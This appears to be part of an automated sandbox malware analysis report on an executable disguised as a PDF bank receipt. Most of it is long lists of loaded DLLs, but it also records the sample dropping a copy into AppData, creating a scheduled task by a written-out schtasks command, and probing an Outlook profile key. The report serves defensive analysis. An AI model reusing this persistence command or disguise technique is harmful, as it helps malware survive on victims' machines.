                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: iconcodecservice.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Automated click: OK
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Automated click: OK
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mscorlib.pdb source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4162079442.0000000006324000.00000004.00000020.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4162004610.0000000006310000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Code function: 0_2_0165272D push dword ptr [ecx]; ret 0_2_01652737
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Code function: 0_2_08155033 push eax; retf 0_2_08155039
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Code function: 0_2_081542B0 push ebx; ret 0_2_081542DA
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Code function: 0_2_0A0F3A29 push esp; ret 0_2_0A0F3A35
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Code function: 0_2_0A0F3BC8 pushfd ; ret 0_2_0A0F3BD5
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Code function: 0_2_0B84036B push ecx; ret 0_2_0B84036C
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Code function: 8_2_0160272D push dword ptr [ecx]; ret 8_2_01602737
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Code function: 8_2_018D2C58 pushfd ; ret 8_2_018D2C65
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Code function: 8_2_018D26B0 push esp; ret 8_2_018D26BD
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Code function: 8_2_018D26E8 pushad ; ret 8_2_018D26F5
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Code function: 8_2_0892036B push ecx; ret 8_2_0892036C
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe | Static PE information: section name: .text entropy: 7.598169781799861
                  Source: teXfNv.exe.0.dr | Static PE information: section name: .text entropy: 7.598169781799861
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | File created: C:\Users\user\AppData\Roaming\teXfNv.exe (dropped file)

                  Boot Survival

                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
